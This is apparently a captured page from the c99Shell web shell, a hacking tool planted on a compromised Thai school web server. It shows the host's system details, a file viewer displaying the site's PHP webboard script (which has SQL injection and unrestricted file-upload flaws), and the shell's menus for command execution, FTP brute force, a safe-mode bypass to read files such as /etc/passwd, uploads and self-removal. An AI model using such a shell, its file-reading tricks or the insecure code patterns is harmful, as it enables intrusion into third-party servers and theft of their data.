!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     post.php (8 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
include("../include/FunctionDB.php");
include(
"../config.inc.php");
include(
"../function.php");
     
ConnectDB();
?>
    <html>
    <head>
    <title><?echo $title?></title>
    <meta http-equiv="Content-Type" content="text/html; charset=Windows-874">
    <link href="../style.css" rel="stylesheet" type="text/css">
    </head>
    
    <body background="pic/bg2.gif">

 <?
    
    
    
if(getenv(HTTP_X_FORWARDED_FOR)) 
    {
        
$IP getenv(HTTP_X_FORWARDED_FOR);
    }     
else 
    {
        
$IP getenv("REMOTE_ADDR");
    }
    
$Member 0;

    
// ป้องกันการแทรก html กับ ละเครื่องหมาย ' "
    
$QTitle htmlspecialchars($QTitle);
    
$QNote htmlspecialchars($QNote);
    
$QName htmlspecialchars($QName);
    
$QEmail htmlspecialchars($QEmail);
    
    
// ป้องกันคำหยาบ
    
$word = array("ashole","a s h o l e","a.s.h.o.l.e","bitch","b i t c h","b.i.t.c.h","shit","s h i t","s.h.i.t","fuck","dick","f u c k","d i c k","f.u.c.k","d.i.c.k","มึง","มึ ง","กู","ควย","ค ว ย","ค.ว.ย","ปี้","เหี้ย","เฮี้ย","ชาติหมา","ชาดหมา","ช า ด ห ม า","ช.า.ด.ห.ม.า","ช า ติ ห ม า","ช.า.ติ.ห.ม.า","ไอ้","สัดหมา","สัด","เย็ด","หี");
    
$ban "<font color=red>***</font>";
    for (
$i=$i<sizeof($word) ; $i++) {
        
$QTitle eregi_replace($word[$i],$ban,$QTitle);
        
$QNote eregi_replace($word[$i],$ban,$QNote);
        
$QName eregi_replace($word[$i],$ban,$QName);
        
$QEmail eregi_replace($word[$i],$ban,$QEmail);
    }
        
    
// ตรวจสอบการแทรกรูปภาพ
    
$txt = array(":smile:"":sad:",":red:"":big:"":ent:"":shy:"":sleepy:"":sun:"":sg:"":embarass:"":dead:"":cool:"":clown:"":pukey:"":eek:"":roll:"":smoke:"":angry:"":confused:"":cry:"":lol:"":yawn:"":devil:"":tongue:"":alien:"":tasty:"":crazy:",":h:",":true:",":false:");
    
$pic = array("smile.gif","frown.gif","redface.gif","biggrin.gif","blue.gif","shy.gif","sleepy.gif","sunglasses.gif","supergrin.gif","embarass.gif","dead.gif","cool.gif","clown.gif","pukey.gif","eek.gif","sarcblink.gif","smokin.gif","reallymad.gif","confused.gif","crying.gif","lol.gif","yawn.gif","devil.gif","tongue.gif","aysmile.gif","tasty.gif","grazy.gif","h.gif" ,"true.gif","false.gif");
    for (
$a=$a<sizeof($txt) ; $a++) {
        
$QNote eregi_replace($txt[$a],"<img src=\"pic/$pic[$a]\">",$QNote);
    }

    
// ตรวจสอบว่า มีการป้อน url หรือ email มาหรือไม่ ถ้ามีให้ทำ link
     
//$QNote = stripslashes(htmlspecialchars($QNote));
        //$QNote = eregi_replace ( "<" , "&lt;" , $QNote ) ;
        //$QNote = eregi_replace ( ">" , "&gt;" , $QNote ) ;
        //$QNote = eregi_replace ( "\n", "<br>" , $QNote ) ;

        //สำหรับเปลี่ยนอักขระที่กำหนด ให้เป็นแทก html ต่างๆ

        
$QNote eregi_replace "\[b\]""<b> " $QNote ) ;
        
$QNote eregi_replace "\[/b\]"" </b>" $QNote ) ;
        
$QNote eregi_replace "\[i\]""<i> " $QNote ) ;
        
$QNote eregi_replace "\[/i\]"" </i>" $QNote ) ;
        
$QNote eregi_replace "\[u\]""<u> " $QNote ) ;
        
$QNote eregi_replace "\[sup\]""<sup> " $QNote ) ;
        
$QNote eregi_replace "\[/sup\]"" </sup>" $QNote ) ;
        
$QNote eregi_replace "\[sub\]""<sub> " $QNote ) ;
        
$QNote eregi_replace "\[/sub\]"" </sub>" $QNote ) ;
        
$QNote eregi_replace "\[/u\]"" </u>" $QNote ) ;
        
$QNote eregi_replace "\[\-\-\-\]""&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;" $QNote ) ;
        
$QNote eregi_replace "\[color=red\]""<font color=red > " $QNote ) ;
        
$QNote eregi_replace "\[color=green\]""<font color=green> " $QNote ) ;
        
$QNote eregi_replace "\[color=blue\]""<font color=blue> " $QNote ) ;
        
$QNote eregi_replace "\[color=orange\]""<font color=FF6600> " $QNote ) ;
        
$QNote eregi_replace "\[color=pink\]""<font color=FF00FF> " $QNote) ;
        
$QNote eregi_replace "\[color=gray\]""<font color=999999> " $QNote ) ;
        
$QNote eregi_replace "\[/color\]"" </font>" $QNote ) ;

        
$QNote eregi_replace "\[glow\]"," <table style=filter:glow(color=pink, strength=3)>  "$QNote ) ;
        
$QNote eregi_replace "\[/glow\]"" </table>" $QNote ) ;

        
$QNote eregi_replace "\[shadow\]","<table style=\"filter:shadow(color=pink, direction=left)\"> "$QNote ) ;
        
$QNote eregi_replace "\[/shadow\]"" </table>" $QNote ) ;
$QNote eregi_replace ("\[img\]([[:alnum:]]+)://([^[:space:]]*)([[:alnum:]])\[/img\]""<img src=\"\\1://\\2\\3\">",$QNote ) ;
    
// ให้ขึ้นบันทัดใหม่ กรณีที่มีการเคาะ Enter
    
$QNote eregi_replace(chr(13)," <br> "$QNote );

$QNote eregi_replace("(^|[>[:space:]\n])([[:alnum:]]+)://([^[:space:]]*)([[:alnum:]#?/&=])([<[:space:]\n]|$)","<a href=\"\\2://\\3\\4\" target=\"_blank\">\\2://\\3\\4</a>"$QNote );
    
$QNote eregi_replace("([[:alnum:]]+)@([^[:space:]]*)([[:alnum:]])([<[:space:]\n]|$)","<a href=mailto:\\1@\\2\\3\>\\1@\\2\\3</a>"$QNote );
// ตรวจสอบว่าเป็นสมาชิกหรือไม่ 
    //mysql_connect($host,$user,$passwd);
    //mysql_query("SET NAMES 'tis620'");
    
$sql "select Teacher_code from personal_tb WHERE Teacher_code='$Teacher_code ' "
    
$result mysql_db_query($dbname,$sql);
    
$NRow mysql_num_rows($result);
    
$row mysql_fetch_array($result);

    
// ตรวจสอบว่า Password ถูกหรือไม่    
//    if($QName==$row["User"] && $QPass==$row["Password"]) 
//{ 
    //    $Member = 1;
    //    if(!$QEmail) 
    //        {
//            $QEmail = $row["Email"];
//            }
//    }
//    mysql_close();
    
    // บันทึกรูปภาพ
    
if(($QNote =='')&&($QName==''))
{  
    echo 
"<center >";
    echo 
"<font size=+1 color=\"red\">";
    echo 
"ข้อความส่งมาไม่สมบูรณ์อาจใส่ข้อมูลไม่ครบ หรือตกหล่นระหว่างการส่งข้อมูล กรุณาส่งข้อความอีกครั้ง<br><br>";

    echo 
"<font size=+1 color=red >";
    echo 
"<a href='javascript:history.back(1)'>[ กลับไปแก้ไข ] </a>";
    echo 
"</font>";
    echo 
"</center>";
    
        exit();
    }
    
    if(
$Teacher_code) {if( $QPic !='')
    { 
    
$Pic_name substr ($QPic_name, -4);
            
srand((double)microtime()*1000000); 
            
$QPic_name=$random_pic rand(1,9999);
        
#ตรวจสอบขนาดของรูป
#แปลงนามสกุล และทำการ upload
if ( $QPic_type == "image/png" )
        {
            
$filename $QPic_name.".png";
        }

if ( 
$QPic_type == "image/gif" )
        {
            
$filename $QPic_name.".gif";
        }
if ( 
$QPic_type == "image/bmp" )
        {
            
$filename $QPic_name.".bmp";
        }
        if( 
$Pic_name == ".swf" )
        {
            
$filename  =strtolower($QPic_name.'.swf');            
        }
elseif((
$QPic_type=="image/jpg")||($QPic_type=="image/jpeg")||($QPic_type=="image/pjpeg"))    
        {
            
$filename =strtolower($QPic_name.'.jpg');
        }

if(
$QPic_size>$Image_size) {
                echo 
"ขนาดของภาพเกิน $Image_size bytes [$Image_msg]<br>";
                exit();
            }
            
copy ($QPic "$path/" $filename );
        
             }

    }
    
else
            {
            echo 
            
"<table width=60% border=1 bordercolor=\"#ff69b4\" bgcolor=\"#f0ffff\" cellpadding=\"2|' cellspacing=\"0\" align=\"center\">
    <tr align=\"center\"><td align=\"center\"><font color=\"red\" size=\"3\">ต้องเป็นสมาชิกครับถึงจะ post รูปได้</font>
        </td></tr></table><br>"
;
            }
    
// ปรับเวลาให้ตรงกับเวลาเมืองไทย กรณีที่ server อยู่ที่เมืองนอก
    //$mdate = date("Y-m-d H:i:s");
     
setlocale (LC_TIME$locale);
    
$mdatestrftime("%Y-%m-%d %H:%M:%S");
    
//$mdate= strftime("%Y-%m-%d %X");
    // เขียนข้อมูลลง database
    
mysql_connect($host,$user,$passwd);
    
mysql_query("SET NAMES 'tis620'");
    
$sql "insert into webboard_data (Category,Teacher_code,Question,Note,Name,Namer,Member,IP,Email,Date,nphoto) values ('$Category','$Teacher_code','$QTitle','$QNote','$QName','$MsgBy','$Member','$IP','$QEmail','$mdate','$filename')";
        
$result1 mysql_db_query($dbname,$sql);
    if(!
$result1) { echo "Error : Can not save to database"; exit(); }
    
mysql_close();
        
?>
<html>
    
    <title><?echo $title?></title>
    <META HTTP-EQUIV="Content-Type" content="text/html; charset=Windows-874">
    <META HTTP-EQUIV="REFRESH" CONTENT="3; URL=ComputerList.php?Teacher_code=<? echo $Teacher_code?>">


    
        <center>
        <table width=60% border=1 bordercolor=#ff69b4 bgcolor=#f0ffff cellpadding=2 cellspacing=0>
        <tr><td align=center>
        <font size=2 face='MS Sans Serif'>
        <font size=3 color=red><b>ได้รับข้อมูลแล้วครับ</b></font><br><br>
        หากกลับไปหน้าแรกแล้วคำถามของคุณยังไม่ขึ้นให้ลองกดปุ่ม Refresh/Reload ครับ
        </font></td></tr></table>
        <br><hr color=FF1493 width=600>
        
        </center>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0148 ]--